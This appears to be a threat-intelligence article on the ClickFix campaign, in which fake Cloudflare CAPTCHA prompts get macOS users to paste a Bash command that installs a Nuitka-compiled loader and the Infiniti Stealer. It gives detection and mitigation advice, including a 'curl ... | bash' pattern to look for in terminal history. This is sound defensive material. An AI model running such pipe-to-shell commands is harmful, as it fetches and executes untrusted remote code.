ClickFix Social Engineering Drops Infiniti Stealer on macOS

Overview of the ClickFix macOS Campaign

A sophisticated social engineering campaign, dubbed “ClickFix,” has expanded its reach to target macOS users with a Python-based information stealer known as Infiniti Stealer. This campaign leverages the brand reputation of Cloudflare to trick users into executing malicious code on their local machines. According to SecurityWeek, the attack begins when a user encounters a compromised website displaying a fake CAPTCHA or “human verification” prompt.

This Phishing tactic relies on a psychological trick where the victim is told that the automated verification has failed. To proceed, the user is instructed to copy a pre-generated command to their clipboard, open their terminal, and paste the command for manual verification. This TTP is particularly dangerous because it bypasses traditional browser-based security sandbox controls by moving the execution to the operating system’s command-line interface.

Technical Analysis of the Infiniti Stealer Infection Chain

The infection begins with a fake Cloudflare-themed popup. When the user follows the instructions to “Verify you are human,” they are actually copying a encoded Bash command. Once executed in the Terminal, this command initiates a multi-stage download process. The first stage typically involves a simple script that fetches a more complex payload from a remote C2 server.

The payload delivered in this campaign is a loader compiled with Nuitka, a tool that translates Python code into C++ to create a standalone executable. This technique is often used by malware authors to hinder static analysis and make the binary more difficult for EDR solutions to inspect. The loader then deploys Infiniti Stealer, which is specifically designed to exfiltrate sensitive data from macOS environments.

Infiniti Stealer targets a wide range of information, including:

• Browser cookies and saved credentials from Chrome, Firefox, and Safari.
• Discord tokens and session information.
• Cryptocurrency wallet data and private keys.
• System metadata and hardware specifications.

How to detect ClickFix malware on macOS

Security teams looking for how to detect ClickFix malware on macOS should focus on process monitoring. Specifically, defenders should look for instances where a browser process (such as Google Chrome or Safari) is the parent of a Terminal.app or bash/zsh process that immediately executes a network-facing command like curl or wget. Under normal circumstances, users rarely copy commands from a webpage to resolve a CAPTCHA, making this behavior a high-fidelity IoC.

Furthermore, monitoring for the execution of binaries compiled with Nuitka in user-writable directories (e.g., /tmp/ or ~/Library/Application Support/) can provide an additional layer of detection. These binaries often exhibit suspicious MITRE ATT&CK behaviors such as credential dumping and system information discovery.

Analysis of the Infiniti Stealer macOS detection

When conducting an analysis of the Infiniti Stealer macOS detection capabilities within a SOC, it is vital to correlate network traffic with process execution. The malware frequently communicates with known malicious domains or IP addresses associated with the ClickFix infrastructure. Blocking these domains at the DNS level can prevent the initial script from fetching the Nuitka loader.

Because this attack relies on user interaction rather than a software CVE, traditional patching is ineffective. Instead, organizations should adopt Zero Trust principles by limiting the permissions of standard users, ensuring they cannot execute commands that modify system-level configurations without administrative Privilege Escalation prompts.

Mitigation and Defense Strategies

To defend against ClickFix and Infiniti Stealer, organizations must combine technical controls with robust user awareness training. Users must be educated on the risks of copying and pasting commands into the terminal, especially those originating from web-based “verification” prompts.

From a technical perspective, administrators should:

1. Deploy EDR solutions configured to alert on suspicious shell command execution initiated by web browsers.
2. Implement content filtering to block known ClickFix delivery domains.
3. Monitor for unauthorized exfiltration of keychain data or browser profile folders.
4. Review terminal history logs for unusual curl commands that pipe output directly into a shell (e.g., curl ... | bash).

By focusing on the behavioral patterns of the ClickFix campaign, security professionals can identify and remediate these threats before significant data loss occurs.